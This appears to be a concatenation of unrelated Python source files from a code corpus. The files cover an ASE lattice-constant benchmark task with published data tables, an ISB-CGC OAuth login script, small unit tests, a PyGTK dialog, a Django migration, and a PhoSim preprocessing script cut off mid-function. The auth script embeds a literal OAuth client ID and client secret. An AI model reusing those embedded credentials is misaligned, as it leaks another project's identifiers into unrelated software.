Calculation of the lattice constant of solids with semilocal functionals
Phys. Rev. B 79, 085104 (2009)
dx.doi.org/10.1103/PhysRevB.79.085104
Data extracted to csv files with:
* lattice constant::
pdftotext -layout -f 3 -l 4 e085104.pdf - | sed -n '/Solid/,$p' \
| sed -n '/me /q;p' | grep -E -v "085104|TRAN|TABLE" \
| sed '/^$/d' | sed -e 1b -e '/^Solid/d' \
| sed 's/Expt./Expt1. Expt2./' | sed 's/Solid/Solid Str/' \
| sed -e 's/\s\+/,/g'
* erratum::
pdftotext -layout e209902.pdf - | sed -n '/Solid/,$p' | sed -n '/me /q;p' \
| sed '/^$/d' \
| sed 's/Expt./Expt1. Expt2./' | sed 's/Solid/Solid Str/' \
| sed -e 's/\s\+/,/g'
"""
import ase.units as units
from ase.lattice import bulk
from ase.tasks.io import read_json
from ase.tasks.bulk import BulkTask
from ase.utils.eos import EquationOfState
strukturbericht = {'A1': 'fcc',
'A2': 'bcc',
'A4': 'diamond',
'B1': 'rocksalt',
'B2': 'cesiumchloride',
'B3': 'zincblende',
'C1': 'fluorite'}
class HaasTranBlahaBulkCollection:
# e085104.pdf, lattice constant
data1 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt1.,Expt2.
Li,A2,3.363,3.435,3.433,3.449,3.456,3.455,3.435,3.451,3.477
Na,A2,4.047,4.175,4.170,4.199,4.209,4.237,4.196,4.209,4.225
K,A2,5.045,5.231,5.213,5.256,5.293,5.352,5.282,5.212,5.225
Rb,A2,5.374,5.605,5.579,5.609,5.692,5.749,5.670,5.577,5.585
Ca,A1,5.333,5.469,5.456,5.458,5.491,5.533,5.530,5.556,5.565
Sr,A1,5.786,5.930,5.917,5.914,5.975,6.018,6.027,6.040,6.048
Ba,A2,4.754,4.881,4.881,4.870,4.963,4.991,5.030,5.002,5.007
V,A2,2.932,2.959,2.963,2.965,2.961,2.979,3.001,3.024,3.028
Nb,A2,3.250,3.268,3.274,3.280,3.271,3.297,3.312,3.294,3.296
Ta,A2,3.257,3.280,3.285,3.290,3.281,3.300,3.323,3.299,3.301
Mo,A2,3.116,3.126,3.133,3.139,3.128,3.151,3.164,3.141,3.144
W,A2,3.143,3.155,3.162,3.167,3.156,3.173,3.191,3.160,3.162
Fe,A2,2.754,2.783,2.790,2.793,2.787,2.804,2.833,2.853,2.861
Rh,A1,3.759,3.772,3.785,3.795,3.777,3.807,3.834,3.793,3.798
Ir,A1,3.828,3.834,3.847,3.857,3.837,3.867,3.887,3.831,3.835
Ni,A1,3.423,3.453,3.463,3.468,3.461,3.478,3.518,3.508,3.516
Pd,A1,3.848,3.867,3.882,3.892,3.878,3.909,3.948,3.876,3.881
Pt,A1,3.909,3.917,3.932,3.944,3.923,3.958,3.985,3.913,3.916
Cu,A1,3.522,3.557,3.570,3.573,3.568,3.585,3.632,3.596,3.603
Ag,A1,4.007,4.038,4.058,4.065,4.059,4.093,4.152,4.062,4.069
Au,A1,4.047,4.061,4.081,4.092,4.074,4.115,4.154,4.062,4.065
Al,A1,3.983,4.008,4.018,4.023,4.008,4.015,4.041,4.019,4.032
C,A4,3.536,3.552,3.557,3.558,3.553,3.573,3.575,3.544,3.567
Si,A4,5.407,5.425,5.438,5.437,5.439,5.466,5.475,5.415,5.430
Ge,A4,5.632,5.662,5.684,5.686,5.688,5.734,5.769,5.639,5.652
Sn,A4,6.481,6.521,6.547,6.548,6.566,6.621,6.661,6.474,6.482
Pb,A1,4.874,4.899,4.931,4.936,4.945,4.997,5.048,4.912,4.916
Th,A1,4.920,4.928,4.959,4.977,4.954,5.032,5.056,5.071,5.074
LiF,B1,3.919,4.008,4.013,4.017,4.046,4.047,4.071,3.960,4.010
LiCl,B1,4.986,5.062,5.081,5.087,5.142,5.151,5.167,5.072,5.106
NaF,B1,4.507,4.637,4.635,4.652,4.682,4.702,4.709,4.576,4.609
NaCl,B1,5.484,5.608,5.619,5.637,5.696,5.715,5.714,5.565,5.595
MgO,B1,4.169,4.217,4.222,4.223,4.228,4.244,4.261,4.186,4.207
MgS,B1,5.139,5.174,5.190,5.195,5.197,5.237,5.238,5.182,5.202
CaO,B1,4.719,4.771,4.778,4.777,4.790,4.819,4.841,4.787,4.803
TiC,B1,4.266,4.294,4.302,4.303,4.297,4.336,4.339,4.317,4.330
TiN,B1,4.178,4.202,4.210,4.214,4.206,4.241,4.254,4.228,4.239
ZrC,B1,4.647,4.664,4.675,4.680,4.670,4.711,4.715,4.688,4.696
ZrN,B1,4.532,4.549,4.560,4.565,4.555,4.590,4.602,4.574,4.585
HfC,B1,4.578,4.602,4.613,4.618,4.606,4.646,4.660,4.627,4.638
HfN,B1,4.482,4.506,4.515,4.520,4.510,4.543,4.560,4.512,4.520
VC,B1,4.095,4.114,4.123,4.129,4.116,4.151,4.162,4.148,4.160
VN,B1,4.050,4.071,4.081,4.087,4.075,4.112,4.125,4.126,4.141
NbC,B1,4.432,4.446,4.457,4.462,4.448,4.487,4.491,4.462,4.470
NbN,B1,4.361,4.374,4.385,4.392,4.378,4.419,4.426,4.383,4.392
FeAl,B2,2.812,2.837,2.840,2.843,2.839,2.850,2.869,2.882,2.889
CoAl,B2,2.795,2.820,2.824,2.826,2.822,2.833,2.853,2.855,2.861
NiAl,B2,2.834,2.859,2.864,2.866,2.862,2.873,2.894,2.882,2.887
BN,B3,3.585,3.605,3.610,3.610,3.607,3.628,3.629,3.585,3.607
BP,B3,4.496,4.514,4.525,4.526,4.522,4.553,4.553,4.520,4.538
BAs,B3,4.740,4.761,4.775,4.778,4.772,4.808,4.816,4.760,4.777
AlP,B3,5.440,5.464,5.476,5.474,5.479,5.504,5.513,5.445,5.460
AlAs,B3,5.636,5.668,5.681,5.680,5.687,5.713,5.734,5.646,5.658
GaN,B3,4.463,4.492,4.502,4.504,4.501,4.536,4.551,4.520,4.531
GaP,B3,5.401,5.429,5.447,5.448,5.451,5.498,5.514,5.435,5.448
GaAs,B3,5.616,5.650,5.670,5.672,5.678,5.724,5.757,5.637,5.648
InP,B3,5.839,5.869,5.890,5.890,5.898,5.958,5.968,5.856,5.866
InAs,B3,6.038,6.076,6.098,6.100,6.111,6.167,6.195,6.044,6.054
SiC,B3,4.333,4.354,4.360,4.360,4.357,4.371,4.384,4.340,4.358
CeO2,C1,5.371,5.396,5.410,5.415,5.414,5.454,5.475,5.393,5.401
"""
data_ref = {}
for l in data1.split():
if 'Solid' not in l:
l1 = l.split(',')
data_ref[l1[0]] = [l1[1]]
data_ref[l1[0]].extend([float(v) for v in l1[2:]])
# e209902.pdf, lattice constant
data2 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt1.,Expt2.
Rb,A2,5.372,5.592,5.570,5.608,5.676,5.749,5.668,5.577,5.585
Pd,A1,3.840,3.859,3.875,3.884,3.870,3.905,3.942,3.876,3.881
Ge,A4,5.625,5.656,5.678,5.681,5.683,5.724,5.763,5.639,5.652
Sn,A4,6.473,6.513,6.540,6.541,6.557,6.615,6.655,6.474,6.482
LiF,B1,3.911,4.003,4.006,4.012,4.038,4.039,4.068,3.960,4.010
LiCl,B1,4.965,5.042,5.063,5.069,5.118,5.115,5.150,5.072,5.106
NaCl,B1,5.465,5.594,5.605,5.623,5.682,5.704,5.700,5.565,5.595
MgS,B1,5.132,5.169,5.184,5.189,5.191,5.224,5.231,5.182,5.202
HfN,B1,4.472,4.497,4.506,4.511,4.501,4.541,4.550,4.512,4.520
AlAs,B3,5.630,5.663,5.676,5.676,5.680,5.706,5.729,5.646,5.658
GaAs,B3,5.607,5.642,5.662,5.664,5.670,5.715,5.747,5.637,5.648
InP,B3,5.825,5.862,5.880,5.882,5.886,5.951,5.961,5.856,5.866
InAs,B3,6.027,6.065,6.088,6.091,6.102,6.161,6.187,6.044,6.054
CeO2,C1,5.356,5.379,5.394,5.399,5.397,5.439,5.459,5.393,5.401
"""
for l in data2.split():
if 'Solid' not in l:
l1 = l.split(',')
data_ref[l1[0]] = [l1[1]]
data_ref[l1[0]].extend([float(v) for v in l1[2:]])
# F. Tran, private communication, lattice constant
data3 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt2.
Li,A2,3.363,3.435,3.433,3.449,3.456,3.455,3.435,3.451
Na,A2,4.047,4.175,4.170,4.199,4.209,4.237,4.196,4.209
K,A2,5.045,5.231,5.213,5.256,5.293,5.352,5.282,5.212
Rb,A2,5.372,5.592,5.570,5.608,5.676,5.749,5.668,5.577
Ca,A1,5.333,5.469,5.456,5.458,5.491,5.533,5.530,5.556
Sr,A1,5.786,5.930,5.917,5.914,5.975,6.018,6.027,6.040
Ba,A2,4.754,4.881,4.881,4.870,4.963,4.991,5.030,5.002
V,A2,2.932,2.959,2.963,2.965,2.961,2.979,3.001,3.024
Nb,A2,3.250,3.268,3.274,3.280,3.271,3.297,3.312,3.294
Ta,A2,3.257,3.280,3.285,3.290,3.281,3.300,3.323,3.299
Mo,A2,3.116,3.126,3.133,3.139,3.128,3.151,3.164,3.141
W,A2,3.143,3.155,3.162,3.167,3.156,3.173,3.191,3.160
Fe,A2,2.754,2.783,2.790,2.793,2.787,2.804,2.833,2.853
Rh,A1,3.759,3.772,3.785,3.795,3.777,3.807,3.834,3.793
Ir,A1,3.828,3.834,3.847,3.857,3.837,3.867,3.887,3.831
Ni,A1,3.423,3.453,3.463,3.468,3.461,3.478,3.518,3.508
Pd,A1,3.840,3.859,3.875,3.884,3.870,3.905,3.942,3.876
Pt,A1,3.909,3.917,3.932,3.944,3.923,3.958,3.985,3.913
Cu,A1,3.522,3.557,3.570,3.573,3.568,3.585,3.632,3.596
Ag,A1,4.007,4.038,4.058,4.065,4.059,4.093,4.152,4.062
Au,A1,4.047,4.061,4.081,4.092,4.074,4.115,4.154,4.062
Al,A1,3.983,4.008,4.018,4.023,4.008,4.015,4.041,4.019
C,A4,3.536,3.552,3.557,3.558,3.553,3.573,3.575,3.544
Si,A4,5.407,5.425,5.438,5.437,5.439,5.466,5.475,5.415
Ge,A4,5.625,5.656,5.678,5.681,5.683,5.724,5.763,5.639
Sn,A4,6.473,6.513,6.540,6.541,6.557,6.615,6.655,6.474
Pb,A1,4.874,4.899,4.931,4.936,4.945,4.997,5.048,4.912
Th,A1,4.920,4.928,4.959,4.977,4.954,5.032,5.056,5.071
LiF,B1,3.911,4.003,4.006,4.012,4.038,4.039,4.068,3.960
LiCl,B1,4.965,5.042,5.063,5.069,5.118,5.115,5.150,5.072
NaF,B1,4.507,4.637,4.635,4.652,4.682,4.702,4.709,4.576
NaCl,B1,5.465,5.594,5.605,5.623,5.682,5.704,5.700,5.565
MgO,B1,4.169,4.217,4.222,4.223,4.228,4.244,4.261,4.186
MgS,B1,5.132,5.169,5.184,5.189,5.191,5.224,5.231,5.182
CaO,B1,4.719,4.771,4.778,4.777,4.790,4.819,4.841,4.787
TiC,B1,4.266,4.294,4.302,4.303,4.297,4.336,4.339,4.317
TiN,B1,4.178,4.202,4.210,4.214,4.206,4.241,4.254,4.228
ZrC,B1,4.647,4.664,4.675,4.680,4.670,4.711,4.715,4.688
ZrN,B1,4.532,4.549,4.560,4.565,4.555,4.590,4.602,4.574
HfC,B1,4.578,4.602,4.613,4.618,4.606,4.646,4.660,4.627
HfN,B1,4.472,4.497,4.506,4.511,4.501,4.541,4.550,4.512
VC,B1,4.095,4.114,4.123,4.129,4.116,4.151,4.162,4.148
VN,B1,4.050,4.071,4.081,4.087,4.075,4.112,4.125,4.126
NbC,B1,4.432,4.446,4.457,4.462,4.448,4.487,4.491,4.462
NbN,B1,4.361,4.374,4.385,4.392,4.378,4.419,4.426,4.383
FeAl,B2,2.812,2.837,2.840,2.843,2.839,2.850,2.869,2.882
CoAl,B2,2.795,2.820,2.824,2.826,2.822,2.833,2.853,2.855
NiAl,B2,2.834,2.859,2.864,2.866,2.862,2.873,2.894,2.882
BN,B3,3.585,3.605,3.610,3.610,3.607,3.628,3.629,3.585
BP,B3,4.496,4.514,4.525,4.526,4.522,4.553,4.553,4.520
BAs,B3,4.740,4.761,4.775,4.778,4.772,4.808,4.816,4.760
AlP,B3,5.440,5.464,5.476,5.474,5.479,5.504,5.513,5.445
AlAs,B3,5.630,5.663,5.676,5.676,5.680,5.706,5.729,5.646
GaN,B3,4.463,4.492,4.502,4.504,4.501,4.536,4.551,4.520
GaP,B3,5.401,5.429,5.447,5.448,5.451,5.498,5.514,5.435
GaAs,B3,5.607,5.642,5.662,5.664,5.670,5.715,5.747,5.637
InP,B3,5.825,5.862,5.880,5.882,5.886,5.951,5.961,5.856
InAs,B3,6.027,6.065,6.088,6.091,6.102,6.161,6.187,6.044
SiC,B3,4.333,4.354,4.360,4.360,4.357,4.371,4.384,4.340
CeO2,C1,5.356,5.379,5.394,5.399,5.397,5.439,5.459,5.393
"""
data_priv = {}
for l in data3.split():
if 'Solid' not in l:
l1 = l.split(',')
data_priv[l1[0]] = [l1[1]]
data_priv[l1[0]].extend([float(v) for v in l1[2:]])
# F. Tran, private communication, bulk modulus
data4 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt2.
Li,A2,15.2,13.7,13.7,13.4,13.2,13.5,14.0,13.0
Na,A2,9.41,7.91,7.88,7.32,7.50,7.37,7.85,7.50
K,A2,4.50,3.69,3.73,3.49,3.45,3.34,3.61,3.70
Rb,A2,3.59,2.82,2.88,2.71,2.59,2.53,2.77,3.10
Ca,A1,18.7,17.8,18.0,17.4,17.6,17.4,17.3,18.4
Sr,A1,14.4,12.2,12.5,12.2,11.8,11.5,11.4,12.3
Ba,A2,10.6,9.0,9.3,9.2,8.5,8.2,8.2,9.3
V,A2,213,203,201,198,199,196,183,162
Nb,A2,193,186,184,183,183,180,171,170
Ta,A2,219,210,208,207,208,206,195,194
Mo,A2,294,288,282,279,284,277,260,272
W,A2,336,329,322,320,325,319,303,296
Fe,A2,254,233,226,227,224,220,194,168
Rh,A1,320,309,298,292,300,284,259,269
Ir,A1,395,392,377,368,383,360,336,355
Ni,A1,259,239,232,231,231,221,200,186
Pd,A1,231,218,208,207,207,194,170,195
Pt,A1,301,296,282,276,285,265,242,277
Cu,A1,191,177,170,168,168,165,141,142
Ag,A1,140,127,120,119,116,109,91,109
Au,A1,200,192,180,177,179,165,144,167
Al,A1,84.3,86.6,83.0,80.6,86.3,87.2,79.2,79.4
C,A4,469,458,452,451,453,431,434,443
Si,A4,96.4,96.4,93.8,94.0,93.2,90.5,88.7,99.2
Ge,A4,72.7,71.1,68.1,67.8,66.5,62.5,59.5,75.8
Sn,A4,45.7,44.0,42.3,42.4,40.3,38.1,36.3,53.0
Pb,A1,50.5,47.5,44.6,45.2,41.7,40.0,35.6,43.0
Th,A1,66.9,64.1,62.7,63.0,61.7,60.0,58.0,54.3
LiF,B1,88.2,73.4,72.8,72.4,66.1,66.8,67.5,69.8
LiCl,B1,42.0,36.6,35.9,35.7,31.4,33.0,32.2,35.4
NaF,B1,61.7,48.5,48.5,45.4,44.3,42.8,44.5,51.4
NaCl,B1,32.7,26.2,26.1,24.7,22.4,23.2,23.7,26.6
MgO,B1,174,158,158,158,154,154,149,165
MgS,B1,84.0,80.3,78.7,78.2,76.7,76.2,74.4,78.9
CaO,B1,129,116,115,116,111,109,105,114
TiC,B1,283,275,270,267,270,255,248,233
TiN,B1,322,307,302,300,301,289,277,277
ZrC,B1,248,241,237,236,236,226,222,230
ZrN,B1,286,276,271,270,271,262,250,215
HfC,B1,257,247,240,238,244,223,218,200
HfN,B1,309,295,290,289,290,279,265,306
VC,B1,349,338,331,328,333,314,307,303
VN,B1,365,352,343,340,344,326,312,233
NbC,B1,335,330,324,319,325,306,301,315
NbN,B1,353,344,335,333,338,323,309,292
FeAl,B2,208,197,194,193,194,191,180,136
CoAl,B2,207,196,193,192,193,191,179,162
NiAl,B2,185,176,173,171,173,171,159,156
BN,B3,405,391,387,387,387,374,373,373
BP,B3,176,173,170,170,169,162,162,152
BAs,B3,148,145,141,141,140,133,132,138
AlP,B3,89.9,88.8,87.1,87.1,85.8,85.9,82.6,86.0
AlAs,B3,75.5,73.8,72.4,72.5,70.8,70.5,67.0,74.0
GaN,B3,204,194,190,190,189,179,173,190
GaP,B3,90.6,87.9,85.2,85.5,83.4,78.6,77.0,87.4
GaAs,B3,74.7,72.1,69.5,69.5,67.5,64.1,61.0,75.6
InP,B3,72.0,69.5,67.4,67.4,65.3,60.7,59.9,71.0
InAs,B3,60.7,58.1,56.0,56.6,53.8,50.7,48.8,58.0
SiC,B3,230,225,222,221,222,217,212,225
CeO2,C1,209,198,195,195,190,189,176,220
"""
data_B_priv = {}
for l in data4.split():
if 'Solid' not in l:
l1 = l.split(',')
data_B_priv[l1[0]] = [l1[1]]
data_B_priv[l1[0]].extend([float(v) for v in l1[2:]])
if 1:
# use private communication data
data = data_priv.copy()
B = data_B_priv.copy()
names = [d.split(',')[0] for d in data3.split()][1:]
labels = data3.split()[0].split(',')
else:
# use private published data (no bulk modulus)
data = data_ref.copy()
B = None
names = [d.split(',')[0] for d in data1.split()][1:]
labels = data1.split()[0].split(',')
def __init__(self, xc='PBE'):
self.xc = xc
def __getitem__(self, name):
d = self.data[name]
# the index of functional in labels less one
# (solid is already as key in d)
a = d[self.labels.index(self.xc) - 1]
cs = strukturbericht[d[0]]
b = bulk(name, crystalstructure=cs, a=a)
M = {'Fe': 2.3, 'Co': 1.2, 'Ni': 0.6}.get(name)
if M is not None:
b.set_initial_magnetic_moments([M] * len(b))
return b
def keys(self):
return self.names
class HaasTranBlahaBulkTask(BulkTask):
def __init__(self, xc='PBE', **kwargs):
BulkTask.__init__(self,
collection=HaasTranBlahaBulkCollection(xc),
**kwargs)
self.summary_keys = ['energy', 'fitted energy',
'crystal structure',
'strukturbericht',
'lattice constant', 'lattice constant error [%]',
'volume', 'volume error [%]',
'B', 'B error [%]']
def analyse(self, atomsfile=None):
try:
BulkTask.analyse(self)
except ValueError: # allow fit outside of range
pass
for name, data in self.data.items():
if 'strains' in data:
atoms = self.create_system(name)
# use relaxed volume if present
if 'relaxed volume' in data:
volume = data['relaxed volume']
else:
volume = atoms.get_volume()
volumes = data['strains']**3 * volume
energies = data['energies']
# allow selection of eos type independent of data
if self.eos is not None:
eos = EquationOfState(volumes, energies, self.eos)
else:
eos = EquationOfState(volumes, energies)
try:
v, e, B = eos.fit()
except ValueError:
pass
else:
data['fitted energy'] = e
data['volume'] = v
data['B'] = B
# with respect tot the reference volume
data['volume error [%]'] = (data['volume'] / atoms.get_volume() - 1) * 100
if self.collection.B:
i = self.collection.labels.index(self.collection.xc) - 1
B = self.collection.B[name][i] * units.kJ * 1e-24
data['B error [%]'] = (data['B'] / B - 1) * 100
else:
data['B error [%]'] = None
data['strukturbericht'] = self.collection.data[name][0]
data['crystal structure'] = strukturbericht[data['strukturbericht']]
# calculate lattice constant from volume
cs = data['crystal structure']
if cs == 'bcc':
a0 = (volume*2)**(1/3.)
a = (data['volume']*2)**(1/3.)
elif cs == 'cesiumchloride':
a0 = (volume)**(1/3.)
a = (data['volume'])**(1/3.)
elif cs in ['fcc',
'diamond',
'zincblende',
'rocksalt',
'fluorite']:
a0 = (volume*4)**(1/3.)
a = (data['volume']*4)**(1/3.)
i = self.collection.labels.index(self.collection.xc) - 1
a0_ref = self.collection.data[name][i]
if 'relaxed volume' not in data:
# no volume relaxation performed - volume equals the reference one
assert abs(a0 - a0_ref) < 1.e-4
data['lattice constant'] = a
data['lattice constant error [%]'] = (a - a0_ref) / a0_ref * 100
if atomsfile:
# MDTMP: TODO
atomdata = read_json(atomsfile)
for name, data in self.data.items():
atoms = self.create_system(name)
e = -data['energy']
for atom in atoms:
e += atomdata[atom.symbol]['energy']
e /= len(atoms)
data['cohesive energy'] = e
if self.collection.xc == 'PBE':
eref = self.collection.data[name][7]
else:
eref = self.collection.data[name][9]
data['cohesive energy error [%]'] = (e / eref - 1) * 100
self.summary_keys += ['cohesive energy',
'cohesive energy error [%]']
if __name__ == '__main__':
# run with emt
from ase.tasks.main import run
run(calcname='emt', task=HaasTranBlahaBulkTask(fit=(5, 0.02)))
| grhawk/ASE | tools/ase/test/tasks/htb.py | Python | gpl-2.0 | 18,943 |
#
# Copyright 2015-2019, Institute for Systems Biology
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authenticates user for accessing the ISB-CGC Endpoint APIs.
#
# May be run from the command line or in scripts/ipython.
#
# The credentials file can be copied to any machine from which you want
# to access the API.
#
# 1. Command Line
# python ./isb_auth.py saves the user's credentials;
# OPTIONAL:
# -v for verbose (returns token!)
# -s FILE sets credentials file [default: ~/.isb_credentials]
# -u URL-only: for use over terminal connections;
# gives user a URL to paste into their browser,
# and asks for an auth code in return
#
# 2. Python
# import isb_auth
# isb_auth.get_credentials()
#
# # optional: to store credentials in a different location
# from oauth2client.file import Storage
# import isb_auth
# import os
#
# storage_file = os.path.join(os.path.expanduser("~"), "{USER_CREDENTIALS_FILE_NAME}")
# storage = Storage(storage_file)
# isb_auth.get_credentials(storage=storage)
#
from __future__ import print_function
from argparse import ArgumentParser
import os
from oauth2client.client import OAuth2WebServerFlow
from oauth2client import tools
from oauth2client.file import Storage
VERBOSE = False
# for native application - same as settings.INSTALLED_APP_CLIENT_ID
CLIENT_ID = '586186890913-atr969tu3lf7u574khjjplb45fgpq1bg.apps.googleusercontent.com'
# NOTE: this is NOT actually a 'secret' -- we're using the 'installed
# application' OAuth pattern here
CLIENT_SECRET = 'XeBxiK7NQ0yvAkAnRIKufkFE'
EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
DEFAULT_STORAGE_FILE = os.path.join(os.path.expanduser("~"), '.isb_credentials')
def maybe_print(msg):
if VERBOSE:
print(msg)
def get_credentials(storage=None, oauth_flow_args=[]):
noweb = '--noauth_local_webserver'
if __name__ != '__main__' and noweb not in oauth_flow_args:
oauth_flow_args.append(noweb)
if storage is None:
storage = Storage(DEFAULT_STORAGE_FILE)
credentials = storage.get()
if not credentials or credentials.invalid:
maybe_print('credentials missing/invalid, kicking off OAuth flow')
flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, EMAIL_SCOPE)
flow.auth_uri = flow.auth_uri.rstrip('/') + '?approval_prompt=force'
credentials = tools.run_flow(flow, storage, tools.argparser.parse_args(oauth_flow_args))
return credentials
def main():
global VERBOSE
args = parse_args()
oauth_flow_args = [args.noauth_local_webserver] if args.noauth_local_webserver else []
VERBOSE = args.verbose
maybe_print('--verbose: printing extra information')
storage = Storage(args.storage_file)
credentials = get_credentials(storage, oauth_flow_args)
maybe_print('credentials stored in ' + args.storage_file)
maybe_print('access_token: ' + credentials.access_token)
maybe_print('refresh_token: ' + credentials.refresh_token)
def parse_args():
parser = ArgumentParser()
parser.add_argument('--storage_file', '-s', default=DEFAULT_STORAGE_FILE, help='storage file to use for the credentials (default is {})'.format(DEFAULT_STORAGE_FILE))
parser.add_argument('--verbose', '-v', dest='verbose', action='store_true', help='display credentials storage location, access token, and refresh token')
parser.set_defaults(verbose=False)
parser.add_argument('--noauth_local_webserver','-u', action='store_const', const='--noauth_local_webserver')
return parser.parse_args()
if __name__ == '__main__':
main() | isb-cgc/ISB-CGC-Webapp | scripts/isb_auth.py | Python | apache-2.0 | 4,266 |
# -*- coding: utf-8 -*-
import unittest
from framework import TestCase
from earth.tag import Tag
class TestTagCase(TestCase):
def test_tag(self):
# ADD
tag_name = '娱乐'
tag = Tag.add(name=tag_name)
assert tag_name == tag.name
assert hasattr(tag, 'id')
# GET
tag_get = Tag.get(tag.id)
tag_by_name = Tag.get_by_name(tag_name)
assert tag_get == tag
assert tag_by_name == tag
# UPDATE
new_tag_name = '不娱乐'
tag.name = new_tag_name
assert Tag.get_by_name(tag_name)
tag.update()
assert not Tag.get_by_name(tag_name)
assert Tag.get_by_name(new_tag_name)
# DELETE
tag.delete()
assert Tag.get(tag.id) == None
assert Tag.get_by_name(new_tag_name) == None
def test_tag_gets(self):
name_cry = '哭死了'
tag_cry = Tag.add(name=name_cry)
assert not Tag.add(name=name_cry)
name_laugh = '笑死了'
tag_laugh = Tag.add(name=name_laugh)
tags = Tag.gets([tag_cry.id, tag_laugh.id])
assert [tag_cry, tag_laugh] == tags
if __name__ == '__main__':
unittest.main()
| tottily/terabithia | monster/test_tag.py | Python | apache-2.0 | 1,202 |
#!/usr/bin/env python
import gtk
class FontSelectionDialog(gtk.FontSelectionDialog):
def __init__(self):
gtk.FontSelectionDialog.__init__(self, title=None)
self.set_title("FontSelectionDialog")
self.connect("response", self.on_response)
def on_response(self, dialog, response):
if response == gtk.RESPONSE_OK:
print "Font selected:", self.get_font_name()
self.destroy()
dialog = FontSelectionDialog()
dialog.run()
| Programmica/pygtk-tutorial | examples/fontselectiondialog.py | Python | cc0-1.0 | 479 |
# Generated by Django 2.0.4 on 2018-06-14 23:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tickets', '0005_auto_20180430_1931'),
]
operations = [
migrations.AddField(
model_name='ticket',
name='cleared_at',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='ticket',
name='status',
field=models.IntegerField(choices=[('1', 'ACK'), ('3', 'CLEARED_ACK'), ('2', 'CLEARED_UNACK'), ('0', 'UNACK')], default=0),
),
]
| IntegratedAlarmSystem-Group/ias-webserver | tickets/migrations/0006_auto_20180614_2303.py | Python | lgpl-3.0 | 626 |
from unittest import TestCase
from safepickle.types.tuple import TupleType
from safepickle.encoding import encode, decode
class TestTuple(TestCase):
def test_tuple(self):
""" Asserts tuple type is handled as expected
"""
obj = (1, 2)
type_ = TupleType()
encoding = type_.encode(obj, encode)
decoding = decode(encoding)
self.assertEqual(obj, decoding)
| nioinnovation/safepickle | safepickle/types/tests/test_tuple.py | Python | apache-2.0 | 416 |
#!/usr/bin/python
"""Perform preprocessing and generate raytrace exec scripts for one focal plane.
For documentation using the python_control for ImSim/PhoSim version <= v.3.0.x,
see README.v3.0.x.txt.
For documentation using the python_control for ImSim/PhoSim version == v.3.2.x,
see README.txt.
The behavior of this script differs depending on the version of ImSim/PhoSim.
For versions <= v3.0.x, it functions like the original fullFocalplane.py and
calls AllChipsScriptGenerator.makeScripts() to generate a script and some tarballs
that can in turn be executed to run the preprocessing step (which in turn calls
AllChipsScriptGenerator) to generate shells scripts and tarballs for performing
the raytrace stage. See README.v3.0.x.txt for more info.
The behavior for ImSim/PhoSim version == 3.2.x is to run the preprocessing step
directly through the class PhosimManager.PhosimPrepreprocessor (which in turn
calls phosim.py in the phosin.git repository). After the preprocessing is
complete, PhosimPreprocessor generates shell scripts for the raytrace phase.
A few notes on options:
--skip_atmoscreens: Use this to optionally skip the step to generate atmosphere
screens during preprocessing and instead perform this
operation at the start of the raytrace phase. This is
useful in distributed environments where the cost of
transferring the atmosphere screens to the compute node
is higher than recalculating them.
--logtostderr: (only v3.2.x and higher) By default, log output from python_controls
is done via the python logging module, and directed to either
log_dir in the imsim_config_file or /tmp/fullFocalplane.log
if log_dir is not specified. This option overrides this behavior
and prints logging information to stdout. Note: output from
phosim.py and the phosim binaries are still printed to stdout.
TODO(gardnerj): Add stdout log redirect
TODO(gardnerj): Support sensor_ids argument for phosim.py.
TODO(gardnerj): Support not running e2adc step.
"""
from __future__ import with_statement
import ConfigParser
from distutils import version
import logging
from optparse import OptionParser # Can't use argparse yet, since we must work in 2.5
import os
import sys
from AllChipsScriptGenerator import AllChipsScriptGenerator
import PhosimManager
import PhosimUtil
import PhosimVerifier
import ScriptWriter
__author__ = 'Jeff Gardner (gardnerj@phys.washington.edu)'
logger = logging.getLogger(__name__)
def DoPreprocOldVersion(trimfile, policy, extra_commands, scheduler, sensor_id):
"""Do preprocessing for v3.1.0 and earlier.
Args:
trimfile: Full path to trim metadata file.
policy: ConfigParser object from python_controls config file.
extra_commands: Full path to extra commands or 'extraid' file.
scheduler: Name of scheduler (currently, just 'csh' is supported).
sensor_id: If not '', run just this single sensor ID.
Returns:
0 (success)
"""
with PhosimUtil.WithTimer() as t:
# Determine the pre-processing scheduler so that we know which class to use
if scheduler == 'csh':
scriptGenerator = AllChipsScriptGenerator(trimfile, policy, extra_commands)
scriptGenerator.makeScripts(sensor_id)
elif scheduler == 'pbs':
scriptGenerator = AllChipsScriptGenerator_Pbs(trimfile, policy, extra_commands)
scriptGenerator.makeScripts(sensor_id)
elif scheduler == 'exacycle':
print 'Exacycle funtionality not added yet.'
return 1
else:
print 'Scheduler "%s" unknown. Use -h or --help for help.' % scheduler
t.LogWall('makeScripts')
return 0
def DoPreproc(trimfile, imsim_config_file, extra_commands, scheduler,
skip_atmoscreens=False, keep_scratch_dirs=False):
"""Do preprocessing for v3.2.0 and later.
Args:
trimfile: Full path to trim metadata file.
imsim_config_file: Full path to the python_controls config file.
extra_commands: Full path to extra commands or 'extraid' file.
scheduler: Name of scheduler (currently, just 'csh' is supported).
skip_atmoscreens: Generate atmosphere screens in raytrace stage instead
of preprocessing stage.
keep_scratch_dirs: Do not delete the working directories at the end of
execution.
Returns:
0 upon success, 1 upon failure.
"""
if scheduler == 'csh':
preprocessor = PhosimManager.Preprocessor(imsim_config_file,
trimfile, extra_commands)
elif scheduler == 'pbs':
# Construct PhosimPreprocessor with PBS-specific ScriptWriter
preprocessor = PhosimManager.Preprocessor(
imsim_config_file, trimfile, extra_commands,
script_writer_class=ScriptWriter.PbsRaytraceScriptWriter)
